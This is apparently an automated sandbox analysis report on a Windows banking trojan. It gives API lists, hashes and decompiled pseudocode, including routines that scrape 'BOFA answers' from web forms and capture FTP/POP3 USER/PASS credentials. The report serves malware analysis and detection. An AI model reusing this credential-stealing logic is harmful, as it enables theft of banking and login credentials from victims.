        • Opcode Fuzzy Hash: 5c1c5d03e7af52288e2152c0f95b010bc506728b7939cea5624a15ade6595df0
        • Instruction Fuzzy Hash: 275158B1500208AFDB20DF95DC84E9ABBF9EF48744B01847AF659972A1C734ED90CB68
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040E6DE, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 105networkfileCOMMON
        Download Yara Rule
        APIs
        • RtlEnterCriticalSection.NTDLL(essAsUserA), ref: 0040E6EC
        • ResetEvent.KERNEL32(?), ref: 0040E71A
        • SetEvent.KERNEL32(?), ref: 0040E75C
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040E763
        • InternetQueryOptionA.WININET(?,0000002D,00000000,?), ref: 0040E78C
        • InternetSetOptionA.WININET(?,0000002D,00000000,00000004), ref: 0040E7A2
        • RtlLeaveCriticalSection.NTDLL(essAsUserA), ref: 0040E7AF
        • InternetReadFile.WININET(?,?,?,?), ref: 0040E7C7
        • InternetReadFileExA.WININET(?,?,?,?), ref: 0040E7E1
        • InternetReadFileExW.WININET(?,?,?,?), ref: 0040E7F5
        • InternetQueryDataAvailable.WININET(?,?,?,?), ref: 0040E803
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Internet$CriticalFileReadSection$EventLeaveOptionQuery$AvailableDataEnterReset
        • String ID: essAsUserA
        • API String ID: 830436639-2345198579
        • Opcode ID: 3f4d1e09826d968525983d0e2231fffbfa76bbd889cc058636a3e7833fac8513
        • Instruction ID: 95cd27109e6c7b157856d299dcac923864d27704287419ea295d8ff10f261555
        • Opcode Fuzzy Hash: 3f4d1e09826d968525983d0e2231fffbfa76bbd889cc058636a3e7833fac8513
        • Instruction Fuzzy Hash: 37417B72400209BFDF129F51DC48AEA7F76FF88350F248426F915662A1C379D9A1EB98
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040C849, Relevance: 17.9, APIs: 5, Strings: 5, Instructions: 375stringnetworkCOMMON
        Download Yara Rule
        C-Code - Quality: 79%
        			E0040C849(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				signed int _v9;
				char _v16;
				char* _v20;
				char* _v24;
				signed int _v28;
				signed int _v32;
				void* _v36;
				char* _v40;
				char _v1064;
				void* _t127;
				void* _t132;
				char _t134;
				signed int _t144;
				char _t145;
				signed int _t157;
				char _t158;
				char* _t159;
				char* _t163;
				signed int _t168;
				intOrPtr _t169;
				char* _t170;
				intOrPtr _t173;
				int _t175;
				signed int _t178;
				void* _t180;
				intOrPtr _t182;
				intOrPtr _t183;
				intOrPtr _t186;
				intOrPtr _t187;
				intOrPtr _t190;
				intOrPtr _t191;
				void* _t193;
				intOrPtr _t194;
				intOrPtr* _t196;
				char* _t197;
				char* _t198;
				char _t199;
				intOrPtr _t201;
				intOrPtr _t203;
				void* _t216;
				void* _t219;
				void* _t223;
				void* _t224;
				void* _t226;
				char _t227;
				char* _t228;
				void* _t230;
				intOrPtr* _t233;
				void* _t234;
				intOrPtr _t235;
				intOrPtr* _t236;
				char* _t237;
				signed int _t238;
				void* _t239;
				void* _t240;

				_t230 = __esi;
				_t219 = __edi;
				_t193 = __ebx;
				 *0x414dd8( &_v1064, _a4);
				_t127 = E0040F637( &_v1064);
				while(1) {
					_t127 = _t127 - 1;
					if(_t127 == 0) {
						break;
					}
					if( *((char*)(_t239 + _t127 - 0x424)) != 0x2f) {
						continue;
					}
					_t201 =  *0x414ad4; // 0x241f5a8
					 *0x414dd8(_t239 + _t127 - 0x423,  *((intOrPtr*)(_t201 + 0x150)), _t219);
					E00412C4A();
					_t132 = InternetOpenA( *0x4155d4, 0, 0, 0, 0);
					if(_t132 == 0 || InternetOpenUrlA(_t132,  &_v1064, 0, 0, 0x84043300, 0) == 0) {
						L95:
						break;
					} else {
						_push(_t230);
						_t134 = E004070A8( &_v1064,  &_v36, 0xffff, _t133);
						_v8 = _t134;
						if(_t134 == 0) {
							L94:
							goto L95;
						}
						_t233 = _v36;
						_push(_t193);
						_t194 = 0;
						_t216 = 0;
						_t223 = "*<select " - _t233;
						do {
							_t203 =  *((intOrPtr*)(_t223 + _t233));
							if(_t203 - 0x41 <= 0x19) {
								_t203 = _t203 + 0x20;
							}
							if(_t203 != 0x23) {
								__eflags = _t203 - 0x2a;
								if(_t203 == 0x2a) {
									_t16 = _t216 + 1; // 0x1
									__eflags = _t16 - 9;
									if(__eflags != 0) {
										__eflags = _t194 - _v8;
										if(_t194 >= _v8) {
											goto L93;
										}
										_t224 = 8;
										_t225 = _t224 - _t216;
										__eflags = _t224 - _t216;
										_t20 = _t216 +  &M00403E95; // 0x403e95
										_t234 = _t20;
										while(1) {
											_t144 = E0040A3D4(_t234, _t225, _v36 + _t194, _v8 - _t194,  &_v16, 0, 0);
											__eflags = _t144;
											if(_t144 != 0) {
												break;
											}
											_t194 = _t194 + 1;
											__eflags = _t194 - _v8;
											if(_t194 < _v8) {
												continue;
											}
											goto L93;
										}
										_t25 =  &_v16;
										 *_t25 = _v16 + _t194;
										__eflags =  *_t25;
										L28:
										_t145 = _v16;
										_v28 = _v28 & 0x00000000;
										_v32 = _v32 & 0x00000000;
										_v8 = _v8 - _t145;
										_t196 = _t145 + _v36;
										_v9 = 0;
										do {
											_v20 = "*<option  selected";
											_t235 = 0;
											_t226 = 0;
											_v20 = _v20 - _t196;
											_t218 = _t196;
											do {
												_t206 = _v20[_t218];
												if(_t206 - 0x41 <= 0x19) {
													_t206 = _t206 + 0x20;
												}
												if(_t206 != 0x23) {
													__eflags = _t206 - 0x2a;
													if(_t206 == 0x2a) {
														_t44 = _t226 + 1; // 0x1
														__eflags = _t44 - 0x12;
														if(__eflags != 0) {
															__eflags = _t235 - _v8;
															if(__eflags >= 0) {
																goto L91;
															}
															_v20 = 0x11;
															_t49 =  &_v20;
															 *_t49 = _v20 - _t226;
															__eflags =  *_t49;
															_t51 = _t226 +  &M00403EA1; // 0x74706f3c
															_t227 = _t51;
															while(1) {
																_t218 = _v20;
																_t206 = _t227;
																_t157 = E0040A3D4(_t227, _v20, _t235 + _t196, _v8 - _t235,  &_v16, 0, 0);
																__eflags = _t157;
																if(_t157 != 0) {
																	break;
																}
																_t235 = _t235 + 1;
																__eflags = _t235 - _v8;
																if(__eflags < 0) {
																	continue;
																}
																goto L91;
															}
															_t57 =  &_v16;
															 *_t57 = _v16 + _t235;
															__eflags =  *_t57;
															L51:
															_t158 = _v16;
															_t197 = _t196 + _t158;
															_t60 =  &_v8;
															 *_t60 = _v8 - _t158;
															if( *_t60 == 0) {
																goto L91;
															}
															while( *_t197 != 0x3e) {
																_t197 = _t197 + 1;
																_t62 =  &_v8;
																 *_t62 = _v8 - 1;
																if( *_t62 != 0) {
																	continue;
																}
																break;
															}
															if(_v8 == 0) {
																goto L91;
															}
															_t198 = _t197 + 1;
															_t206 = _v8 + _t198;
															_v40 = _t198;
															_t159 = _t198;
															if(_t198 >= _t206) {
																L58:
																if(_t159 == _t206) {
																	goto L91;
																}
																_t206 = _t159 - _t198;
																if(_t159 - _t198 > 0x200) {
																	goto L91;
																}
																_v8 = _v8 + _t198 - _t159;
																_t236 = _t159 + 1;
																_t228 = 0;
																_v24 = "*<input *value=\"";
																_v24 = _v24 - _t236;
																 *_t159 = 0;
																_v20 = 0;
																_t218 = _t236;
																do {
																	_t206 = _v24[_t218];
																	if(_t206 - 0x41 <= 0x19) {
																		_t206 = _t206 + 0x20;
																	}
																	if(_t206 != 0x23) {
																		__eflags = _t206 - 0x2a;
																		if(_t206 == 0x2a) {
																			_t163 = _v20;
																			_t82 = _t163 + 1; // 0x12
																			_t206 = _t82;
																			__eflags = _t82 - 0x10;
																			if(__eflags != 0) {
																				__eflags = _t228 - _v8;
																				if(__eflags >= 0) {
																					goto L91;
																				}
																				_v24 = 0xf;
																				_t87 =  &_v24;
																				 *_t87 = _v24 - _t163;
																				__eflags =  *_t87;
																				_t89 = _t163 +  &M00403EB5; // 0x403ec6
																				_t199 = _t89;
																				while(1) {
																					_t218 = _v24;
																					_t206 = _t199;
																					_t168 = E0040A3D4(_t199, _v24, _t228 + _t236, _v8 - _t228,  &_v16, 0, 0);
																					__eflags = _t168;
																					if(_t168 != 0) {
																						break;
																					}
																					_t228 = _t228 + 1;
																					__eflags = _t228 - _v8;
																					if(__eflags < 0) {
																						continue;
																					}
																					goto L91;
																				}
																				_t95 =  &_v16;
																				 *_t95 = _v16 + _t228;
																				__eflags =  *_t95;
																				_t196 = _v40;
																				L82:
																				_t169 = _v16;
																				_v8 = _v8 - _t169;
																				_t237 = _t236 + _t169;
																				_t206 = _v8 + _t237;
																				_t170 = _t237;
																				if(_t237 >= _t206) {
																					L85:
																					if(_t170 == _t206) {
																						goto L91;
																					}
																					_t206 = _t170 - _t237;
																					if(_t170 - _t237 > 0x200) {
																						goto L91;
																					}
																					 *_t170 = 0;
																					_t173 =  *0x414ad4; // 0x241f5a8
																					_t175 = wnsprintfA( &_v1064, 0x400,  *(_t173 + 0x154), (_v9 & 0x000000ff) + 1, _t196, (_v9 & 0x000000ff) + 1, _t237);
																					_t229 = _t175;
																					_t240 = _t240 + 0x1c;
																					_t238 = _t175 + _v32;
																					_t178 = E0040F117(_t238 + 0xa, _v28);
																					if(_t178 == 0) {
																						E0040F15E(_v28);
																						_t118 =  &_v32;
																						 *_t118 = _v32 & 0x00000000;
																						__eflags =  *_t118;
																						goto L91;
																					}
																					goto L88;
																				}
																				while( *_t170 != 0x22) {
																					_t170 = _t170 + 1;
																					if(_t170 < _t206) {
																						continue;
																					}
																					goto L85;
																				}
																				goto L85;
																			}
																			_v16 = _v8;
																			goto L82;
																		}
																		_t182 =  *_t218;
																		__eflags = _t182 - 0x41;
																		if(_t182 < 0x41) {
																			L70:
																			_t183 = _t182;
																			L71:
																			__eflags = _t206 - _t183;
																			if(__eflags != 0) {
																				goto L91;
																			}
																			goto L72;
																		}
																		__eflags = _t182 - 0x5a;
																		if(_t182 > 0x5a) {
																			goto L70;
																		}
																		_t183 = _t182 + 0x20;
																		goto L71;
																	} else {
																		if(_t228 == _v8) {
																			goto L91;
																		}
																	}
																	L72:
																	_t228 = _t228 + 1;
																	_t218 = _t218 + 1;
																	_v20 =  &(_v20[1]);
																} while (_v20 != 0x10);
																_v16 = _t228;
																goto L82;
															}
															while( *_t159 != 0x3c) {
																_t159 = _t159 + 1;
																if(_t159 < _t206) {
																	continue;
																}
																goto L58;
															}
															goto L58;
														}
														_v16 = _v8;
														goto L51;
													}
													_t186 =  *_t218;
													__eflags = _t186 - 0x41;
													if(_t186 < 0x41) {
														L39:
														_t187 = _t186;
														L40:
														__eflags = _t206 - _t187;
														if(__eflags != 0) {
															goto L91;
														}
														goto L41;
													}
													__eflags = _t186 - 0x5a;
													if(_t186 > 0x5a) {
														goto L39;
													}
													_t187 = _t186 + 0x20;
													goto L40;
												} else {
													if(_t235 == _v8) {
														L91:
														_t282 = _v32;
														if(_v32 != 0) {
															E0041352B(_t206, _t218, _t282, 0xc9, 0, 0, L"BOFA answers:\n\n%S", _v28);
															E0040F15E(_v28);
														}
														goto L93;
													}
												}
												L41:
												_t235 = _t235 + 1;
												_t218 = _t218 + 1;
												_t226 = _t226 + 1;
											} while (_t226 != 0x12);
											_v16 = _t235;
											goto L51;
											L88:
											_t206 = _v32 + _t178;
											_v28 = _t178;
											_t180 = E0040F19A(_v32 + _t178,  &_v1064, _t229);
											_v9 = _v9 + 1;
											_v32 = _t238;
											 *((char*)(_t180 + _t238)) = 0;
										} while (_v9 < 3);
										goto L91;
									}
									_v16 = _v8;
									goto L28;
								}
								_t190 =  *_t233;
								__eflags = _t190 - 0x41;
								if(_t190 < 0x41) {
									L16:
									_t191 = _t190;
									L17:
									__eflags = _t203 - _t191;
									if(__eflags != 0) {
										goto L93;
									}
									goto L18;
								}
								__eflags = _t190 - 0x5a;
								if(_t190 > 0x5a) {
									goto L16;
								}
								_t191 = _t190 + 0x20;
								goto L17;
							} else {
								if(_t194 == _v8) {
									L93:
									E0040F15E(_v36);
									goto L94;
								}
							}
							L18:
							_t194 = _t194 + 1;
							_t233 = _t233 + 1;
							_t216 = _t216 + 1;
						} while (_t216 != 9);
						_v16 = _t194;
						goto L28;
					}
				}
				return E0040F15E(_a4);
			}



























































        0x0040c849
        0x0040c849
        0x0040c849
        0x0040c85c
        0x0040c868
        0x0040c86d
        0x0040c86d
        0x0040c86e
        0x00000000
        0x00000000
        0x0040c87c
        0x00000000
        0x00000000
        0x0040c87e
        0x0040c893
        0x0040c899
        0x0040c8aa
        0x0040c8b2
        0x0040cc75
        0x00000000
        0x0040c8d6
        0x0040c8d6
        0x0040c8e0
        0x0040c8e5
        0x0040c8ea
        0x0040cc74
        0x00000000
        0x0040cc74
        0x0040c8f0
        0x0040c8f3
        0x0040c8f9
        0x0040c8fb
        0x0040c8fd
        0x0040c8ff
        0x0040c8ff
        0x0040c908
        0x0040c90a
        0x0040c90a
        0x0040c910
        0x0040c91d
        0x0040c920
        0x0040c94f
        0x0040c952
        0x0040c955
        0x0040c95f
        0x0040c962
        0x00000000
        0x00000000
        0x0040c96a
        0x0040c96b
        0x0040c96b
        0x0040c96d
        0x0040c96d
        0x0040c973
        0x0040c98b
        0x0040c990
        0x0040c992
        0x00000000
        0x00000000
        0x0040c994
        0x0040c995
        0x0040c998
        0x00000000
        0x00000000
        0x00000000
        0x0040c99a
        0x0040c99f
        0x0040c99f
        0x0040c99f
        0x0040c9a2
        0x0040c9a2
        0x0040c9a8
        0x0040c9ac
        0x0040c9b0
        0x0040c9b3
        0x0040c9b6
        0x0040c9ba
        0x0040c9ba
        0x0040c9c1
        0x0040c9c3
        0x0040c9c5
        0x0040c9c8
        0x0040c9ca
        0x0040c9cd
        0x0040c9d6
        0x0040c9d8
        0x0040c9d8
        0x0040c9de
        0x0040c9eb
        0x0040c9ee
        0x0040ca1d
        0x0040ca20
        0x0040ca23
        0x0040ca2d
        0x0040ca30
        0x00000000
        0x00000000
        0x0040ca36
        0x0040ca3d
        0x0040ca3d
        0x0040ca3d
        0x0040ca40
        0x0040ca40
        0x0040ca46
        0x0040ca46
        0x0040ca5b
        0x0040ca5d
        0x0040ca62
        0x0040ca64
        0x00000000
        0x00000000
        0x0040ca66
        0x0040ca67
        0x0040ca6a
        0x00000000
        0x00000000
        0x00000000
        0x0040ca6c
        0x0040ca71
        0x0040ca71
        0x0040ca71
        0x0040ca74
        0x0040ca74
        0x0040ca77
        0x0040ca79
        0x0040ca79
        0x0040ca7c
        0x00000000
        0x00000000
        0x0040ca82
        0x0040ca87
        0x0040ca88
        0x0040ca88
        0x0040ca8b
        0x00000000
        0x00000000
        0x00000000
        0x0040ca8b
        0x0040ca91
        0x00000000
        0x00000000
        0x0040ca9a
        0x0040ca9b
        0x0040ca9d
        0x0040caa0
        0x0040caa4
        0x0040cab0
        0x0040cab2
        0x00000000
        0x00000000
        0x0040caba
        0x0040cac2
        0x00000000
        0x00000000
        0x0040cacc
        0x0040cacf
        0x0040cad2
        0x0040cad4
        0x0040cadb
        0x0040cade
        0x0040cae1
        0x0040cae4
        0x0040cae6
        0x0040cae9
        0x0040caf2
        0x0040caf4
        0x0040caf4
        0x0040cafa
        0x0040cb07
        0x0040cb0a
        0x0040cb3c
        0x0040cb3f
        0x0040cb3f
        0x0040cb42
        0x0040cb45
        0x0040cb4f
        0x0040cb52
        0x00000000
        0x00000000
        0x0040cb58
        0x0040cb5f
        0x0040cb5f
        0x0040cb5f
        0x0040cb62
        0x0040cb62
        0x0040cb68
        0x0040cb68
        0x0040cb7d
        0x0040cb7f
        0x0040cb84
        0x0040cb86
        0x00000000
        0x00000000
        0x0040cb88
        0x0040cb89
        0x0040cb8c
        0x00000000
        0x00000000
        0x00000000
        0x0040cb8e
        0x0040cb93
        0x0040cb93
        0x0040cb93
        0x0040cb96
        0x0040cb99
        0x0040cb99
        0x0040cb9c
        0x0040cba2
        0x0040cba4
        0x0040cba6
        0x0040cbaa
        0x0040cbb6
        0x0040cbb8
        0x00000000
        0x00000000
        0x0040cbc0
        0x0040cbc8
        0x00000000
        0x00000000
        0x0040cbca
        0x0040cbd6
        0x0040cbed
        0x0040cbf3
        0x0040cbf8
        0x0040cbfe
        0x0040cc04
        0x0040cc0b
        0x0040cc3c
        0x0040cc41
        0x0040cc41
        0x0040cc41
        0x00000000
        0x0040cc41
        0x00000000
        0x0040cc0b
        0x0040cbac
        0x0040cbb1
        0x0040cbb4
        0x00000000
        0x00000000
        0x00000000
        0x0040cbb4
        0x00000000
        0x0040cbac
        0x0040cb4a
        0x00000000
        0x0040cb4a
        0x0040cb0c
        0x0040cb0e
        0x0040cb10
        0x0040cb1e
        0x0040cb1e
        0x0040cb21
        0x0040cb24
        0x0040cb26
        0x00000000
        0x00000000
        0x00000000
        0x0040cb26
        0x0040cb12
        0x0040cb14
        0x00000000
        0x00000000
        0x0040cb19
        0x00000000
        0x0040cafc
        0x0040caff
        0x00000000
        0x00000000
        0x0040cb05
        0x0040cb2c
        0x0040cb2c
        0x0040cb2d
        0x0040cb2e
        0x0040cb31
        0x0040cb37
        0x00000000
        0x0040cb37
        0x0040caa6
        0x0040caab
        0x0040caae
        0x00000000
        0x00000000
        0x00000000
        0x0040caae
        0x00000000
        0x0040caa6
        0x0040ca28
        0x00000000
        0x0040ca28
        0x0040c9f0
        0x0040c9f2
        0x0040c9f4
        0x0040ca02
        0x0040ca02
        0x0040ca05
        0x0040ca08
        0x0040ca0a
        0x00000000
        0x00000000
        0x00000000
        0x0040ca0a
        0x0040c9f6
        0x0040c9f8
        0x00000000
        0x00000000
        0x0040c9fd
        0x00000000
        0x0040c9e0
        0x0040c9e3
        0x0040cc45
        0x0040cc47
        0x0040cc4a
        0x0040cc5b
        0x0040cc66
        0x0040cc66
        0x00000000
        0x0040cc4a
        0x0040c9e9
        0x0040ca10
        0x0040ca10
        0x0040ca11
        0x0040ca12
        0x0040ca13
        0x0040ca18
        0x00000000
        0x0040cc0d
        0x0040cc18
        0x0040cc1b
        0x0040cc1e
        0x0040cc23
        0x0040cc2a
        0x0040cc2d
        0x0040cc2d
        0x00000000
        0x0040cc37
        0x0040c95a
        0x00000000
        0x0040c95a
        0x0040c922
        0x0040c924
        0x0040c926
        0x0040c934
        0x0040c934
        0x0040c937
        0x0040c93a
        0x0040c93c
        0x00000000
        0x00000000
        0x00000000
        0x0040c93c
        0x0040c928
        0x0040c92a
        0x00000000
        0x00000000
        0x0040c92f
        0x00000000
        0x0040c912
        0x0040c915
        0x0040cc6b
        0x0040cc6e
        0x00000000
        0x0040cc73
        0x0040c91b
        0x0040c942
        0x0040c942
        0x0040c943
        0x0040c944
        0x0040c945
        0x0040c94a
        0x00000000
        0x0040c94a
        0x0040c8b2
        0x0040cc7f

        APIs
        • lstrcpy.KERNEL32(?,?), ref: 0040C85C
        • lstrcpy.KERNEL32(?,?), ref: 0040C893
        • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 0040C8AA
        • InternetOpenUrlA.WININET(00000000,0000002F,00000000,00000000,84043300,00000000), ref: 0040C8C8
        • wnsprintfA.SHLWAPI ref: 0040CBED
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: InternetOpenlstrcpy$wnsprintf
        • String ID: *<input *value="$*<option selected$*<select $/$BOFA answers:%S
        • API String ID: 3861095738-10845715
        • Opcode ID: fdb31d928b95f54613987c246785e205f709c1e53995c341fb2ef0808bfd3406
        • Instruction ID: f1905f83d06502bd7186ba75528ab9a8b5b1ff8d47bcde2f7127104675654e2c
        • Opcode Fuzzy Hash: fdb31d928b95f54613987c246785e205f709c1e53995c341fb2ef0808bfd3406
        • Instruction Fuzzy Hash: 9CD1AE71E04109EBDF24CFA9C9C5BEEBBB5EB45300F14427BD506B7281C6386E468B59
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0040ED1A, Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 281COMMON
        Download Yara Rule
        C-Code - Quality: 73%
        			E0040ED1A(void* __eax, int _a4, int _a8) {
				int _v24;
				signed char _v28;
				signed char _v29;
				signed char _v30;
				signed char _v31;
				signed int _v32;
				signed int _v34;
				int _v36;
				char _v37;
				char _v49;
				void* __esi;
				int _t74;
				void* _t75;
				intOrPtr _t76;
				int _t82;
				int _t85;
				int _t97;
				int _t99;
				int _t101;
				int _t103;
				int _t105;
				int _t107;
				void* _t108;
				int _t109;
				int _t116;
				int _t127;
				signed int _t128;
				char* _t133;
				intOrPtr _t134;
				int _t140;
				int _t147;
				int _t149;
				intOrPtr _t151;
				int _t154;
				int _t157;

				_t74 = __eax;
				_t149 = _a8;
				_t154 = __eax;
				if(( *0x414be8 & 0x00000002) == 0) {
					L3:
					__eflags = _t149 - 3;
					if(_t149 < 3) {
						L73:
						return _t74;
					}
					__eflags = _t154;
					if(_t154 == 0) {
						goto L73;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						goto L73;
					}
					_t75 =  *_t154;
					_v28 = 0;
					_v32 = 0;
					__eflags = _t75 - 0x55;
					if(_t75 != 0x55) {
						L12:
						__eflags = _t75 - 0x50;
						if(_t75 != 0x50) {
							while(1) {
								L41:
								__eflags = _t149 - 1;
								if(_t149 <= 1) {
									break;
								}
								_t76 =  *((intOrPtr*)(_t154 + _t149 - 1));
								__eflags = _t76 - 0xd;
								if(_t76 == 0xd) {
									L40:
									_t149 = _t149 - 1;
									__eflags = _t149;
									continue;
								}
								__eflags = _t76 - 0xa;
								if(_t76 != 0xa) {
									break;
								}
								goto L40;
							}
							_t74 = _t149 - 3;
							__eflags = _t74 - 1;
							if(_t74 > 1) {
								goto L73;
							}
							 *0x414ed8("urityDescriptorToAccessNamedA");
							_t127 = E0040EBE3(_a4);
							_v32 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								L72:
								_t74 =  *0x414edc("urityDescriptorToAccessNamedA");
								goto L73;
							}
							__eflags =  *(_t127 + 4);
							if( *(_t127 + 4) == 0) {
								L70:
								_push(0);
								L71:
								E0040EC78(_t127);
								goto L72;
							}
							__eflags =  *(_t127 + 8);
							if( *(_t127 + 8) == 0) {
								goto L70;
							}
							__eflags = _t149 - 3;
							if(_t149 != 3) {
								_t128 = 4;
								__eflags = _t149 - _t128;
								if(_t149 != _t128) {
									goto L72;
								}
								_t151 =  *0x414ad4; // 0x241f5a8
								_t141 = _t128;
								_t82 = E0040F65D(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x134)));
								__eflags = _t82;
								if(_t82 == 0) {
									L56:
									_v37 = 1;
									L60:
									_t127 = _v28;
									L61:
									_v28 = 0x10;
									_t85 =  *0x414cc0(_a4,  &_v24,  &_v28);
									__eflags = _t85;
									if(_t85 != 0) {
										L65:
										__eflags = _v49 - 2;
										if(_v49 != 2) {
											L68:
											_push(0);
											goto L71;
										}
										_t133 = "pop3";
										L67:
										_push((_v34 & 0xff) << 0x00000008 | (_v34 & 0x0000ffff) >> 0x00000008);
										_push(_v29 & 0x000000ff);
										_push(_v30 & 0x000000ff);
										_push(_v31 & 0x000000ff);
										_push(_v32 & 0x000000ff);
										_push( *(_t127 + 8));
										_push( *(_t127 + 4));
										__eflags = _v49 - 1;
										__eflags = (_v49 != 1) + 0x64;
										E0041352B(_t133, (_v34 & 0xff) << 0x00000008 | (_v34 & 0x0000ffff) >> 0x00000008, (_v49 != 1) + 0x64, (_v49 != 1) + 0x64, 0, 0, L"%S://%S:%S@%u.%u.%u.%u:%u/", _t133);
										goto L68;
									}
									_t97 = E004070F0( &_v36);
									__eflags = _t97;
									if(_t97 != 0) {
										goto L65;
									}
									__eflags = _v49 - 1;
									if(_v49 != 1) {
										goto L65;
									}
									_t134 =  *0x414ad4; // 0x241f5a8
									_t99 = E0040F65D(_t141 | 0xffffffff,  *((intOrPtr*)(_t134 + 0x148)), _t141 | 0xffffffff,  *(_t127 + 4));
									__eflags = _t99;
									if(_t99 != 0) {
										_t133 = "ftp";
										goto L67;
									}
									goto L65;
								}
								_t141 = _t128;
								_t101 = E0040F65D(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x138)));
								__eflags = _t101;
								if(_t101 == 0) {
									goto L56;
								}
								_t141 = _t128;
								_t103 = E0040F65D(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x13c)));
								__eflags = _t103;
								if(_t103 != 0) {
									_t141 = _t128;
									_t105 = E0040F65D(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x140)));
									__eflags = _t105;
									if(_t105 == 0) {
										L59:
										_v37 = 2;
										goto L60;
									}
									_t141 = _t128;
									_t107 = E0040F65D(_t128, _t154, _t128,  *((intOrPtr*)(_t151 + 0x144)));
									__eflags = _t107;
									if(_t107 != 0) {
										goto L72;
									}
									goto L59;
								}
								goto L56;
							}
							_t108 =  *_t154;
							__eflags = _t108 - 0x43;
							if(_t108 == 0x43) {
								L49:
								__eflags =  *((char*)(_t154 + 1)) - 0x57;
								if( *((char*)(_t154 + 1)) != 0x57) {
									goto L72;
								}
								__eflags =  *((char*)(_t154 + 2)) - 0x44;
								if( *((char*)(_t154 + 2)) != 0x44) {
									goto L72;
								}
								_v37 = 1;
								goto L61;
							}
							__eflags = _t108 - 0x50;
							if(_t108 != 0x50) {
								goto L72;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t154 + 1)) - 0x41;
						if( *((char*)(_t154 + 1)) != 0x41) {
							goto L41;
						}
						__eflags =  *((char*)(_t154 + 2)) - 0x53;
						if( *((char*)(_t154 + 2)) != 0x53) {
							goto L41;
						}
						__eflags =  *((char*)(_t154 + 3)) - 0x53;
						if( *((char*)(_t154 + 3)) != 0x53) {
							goto L41;
						}
						__eflags =  *((char*)(_t154 + 4)) - 0x20;
						if( *((char*)(_t154 + 4)) != 0x20) {
							goto L41;
						} else {
							_v28 = 5;
							L18:
							_t18 = _t149 - _v32 + 1; // 0x6
							_t74 = _t18;
							__eflags = _t74;
							if(_t74 == 0) {
								goto L73;
							}
							_t74 = E0040F14B(_t74);
							_t147 = _t74;
							_v24 = _t147;
							__eflags = _t147;
							if(_t147 == 0) {
								goto L73;
							}
							_t140 = _v32;
							__eflags = _t140;
							if(_t140 == 0) {
								_t140 = _v28;
							}
							while(1) {
								__eflags = _t140 - _t149;
								if(_t140 >= _t149) {
									break;
								}
								_t109 =  *((intOrPtr*)(_t140 + _t154));
								__eflags = _t109 - 0xa;
								if(_t109 != 0xa) {
									__eflags = _t109 - 0xd;
									if(_t109 != 0xd) {
										__eflags = _t109;
										if(_t109 != 0) {
											 *_t147 = _t109;
										}
									}
								}
								_t140 = _t140 + 1;
								_t147 = _t147 + 1;
								__eflags = _t147;
							}
							 *0x414ed8(0x414f80);
							__eflags = _v36;
							if(_v36 == 0) {
								__eflags = _v32;
								if(_v32 == 0) {
									L37:
									 *0x414edc(0x414f80);
									_t74 = E0040F15E(_v32);
									goto L73;
								}
								_t157 = E0040EBE3(_a4);
								__eflags = _t157;
								if(_t157 == 0) {
									goto L37;
								}
								E0040F15E( *(_t157 + 8));
								__eflags = _a8 - _v36;
								_t116 = E0040F346(_a8 - _v36, _v32);
								 *(_t157 + 8) = _t116;
								L35:
								__eflags = _t116;
								if(_t116 == 0) {
									E0040EC78(_t157, _t116);
								}
								goto L37;
							}
							_t157 = E0040EBE3(_a4);
							__eflags = _t157;
							if(_t157 != 0) {
								L31:
								E0040EC78(_t157, 1);
								 *_t157 = _a4;
								_t116 = E0040F346(_t130, _v32);
								 *(_t157 + 4) = _t116;
								goto L35;
							}
							_t157 = E0040EC1B(_a4);
							__eflags = _t157;
							if(_t157 == 0) {
								goto L37;
							}
							goto L31;
						}
					}
					__eflags =  *((char*)(_t154 + 1)) - 0x53;
					if( *((char*)(_t154 + 1)) != 0x53) {
						goto L12;
					}
					__eflags =  *((char*)(_t154 + 2)) - 0x45;
					if( *((char*)(_t154 + 2)) != 0x45) {
						goto L12;
					}
					__eflags =  *((char*)(_t154 + 3)) - 0x52;
					if( *((char*)(_t154 + 3)) != 0x52) {
						goto L12;
					}
					__eflags =  *((char*)(_t154 + 4)) - 0x20;
					if( *((char*)(_t154 + 4)) != 0x20) {
						goto L12;
					} else {
						_v32 = 5;
						goto L18;
					}
				}
				_t74 = IsBadHugeWritePtr(__eax, _t149);
				if(_t74 != 0) {
					goto L3;
				} else {
					_t74 = E0040F21C(E004102A8(0xff, _t74), _t154, _t124, _t149);
					goto L73;
				}
			}






































        0x0040ed1a
        0x0040ed2d
        0x0040ed30
        0x0040ed32
        0x0040ed58
        0x0040ed58
        0x0040ed5b
        0x0040f09f
        0x0040f0a5
        0x0040f0a5
        0x0040ed63
        0x0040ed65
        0x00000000
        0x00000000
        0x0040ed6b
        0x0040ed6e
        0x00000000
        0x00000000
        0x0040ed74
        0x0040ed76
        0x0040ed7a
        0x0040ed7e
        0x0040ed80
        0x0040eda4
        0x0040eda4
        0x0040eda6
        0x0040eecc
        0x0040eecc
        0x0040eecc
        0x0040eecf
        0x00000000
        0x00000000
        0x0040eebf
        0x0040eec3
        0x0040eec5
        0x0040eecb
        0x0040eecb
        0x0040eecb
        0x00000000
        0x0040eecb
        0x0040eec7
        0x0040eec9
        0x00000000
        0x00000000
        0x00000000
        0x0040eec9
        0x0040eed1
        0x0040eed4
        0x0040eed7
        0x00000000
        0x00000000
        0x0040eee2
        0x0040eef0
        0x0040eef4
        0x0040eef8
        0x0040eefa
        0x0040f094
        0x0040f099
        0x00000000
        0x0040f099
        0x0040ef00
        0x0040ef03
        0x0040f08c
        0x0040f08c
        0x0040f08d
        0x0040f08f
